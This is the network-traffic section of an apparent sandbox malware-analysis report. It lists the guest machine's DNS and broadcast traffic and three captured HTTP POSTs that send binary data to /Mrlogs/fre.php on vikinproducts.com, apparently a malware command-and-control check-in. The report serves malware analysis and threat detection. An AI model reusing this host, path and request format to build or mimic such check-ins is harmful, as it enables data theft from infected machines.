Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
vikinproducts.com | 104.21.26.2 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
POST
404
http://vikinproducts.com/Mrlogs/fre.php
REQUEST
RESPONSE
BODY
POST /Mrlogs/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: vikinproducts.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 270B3BA8
Content-Length: 186
Connection: close
HTTP/1.1 404 Not Found
Date: Fri, 23 Jul 2021 00:12:57 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M2UiaCxj16rcS7n9SRR3sJD0rodJAHAQjqkyflax8YMVv300xBB9TjWM%2BwqI43CsD%2Bisg6RYwTRQXuluqAL%2BxuNRK3rkPs5er8itFYz5iuWl09NXmX9SBAfyTvSYnc7HHlZgZA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6730b337ab9f3143-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
POST
404
http://vikinproducts.com/Mrlogs/fre.php
REQUEST
RESPONSE
BODY
POST /Mrlogs/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: vikinproducts.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 270B3BA8
Content-Length: 186
Connection: close
HTTP/1.1 404 Not Found
Date: Fri, 23 Jul 2021 00:12:58 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PhffZq%2BxRvL8zRP5KtHTVP9J4fIb32%2BE1MZlQCasowk3ZtRRapWZwxDGcrL0XZ52VxQiXIBnBP1F7CFyaaEgRoCYb67wL4HYqogcbNcPtADoG4OHAtdiqm%2FWI%2BYDlKkeZdZGww%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6730b33d5ef904ef-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
POST
404
http://vikinproducts.com/Mrlogs/fre.php
REQUEST
RESPONSE
BODY
POST /Mrlogs/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: vikinproducts.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 270B3BA8
Content-Length: 159
Connection: close
HTTP/1.1 404 Not Found
Date: Fri, 23 Jul 2021 00:12:59 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UinPzrOUXILQi0daLGSqBx9%2FOy6XkgaxALHpjZ8qkpkbRd5VeIaEZLe0L4PMg34iO3nAr9xv%2B7TBsxZ45B%2BVQHaFwhOrrPm8aQqRdZsorXiNsa5dvZa690GjoLGvVXrnLLTThw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6730b342afcd313d-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts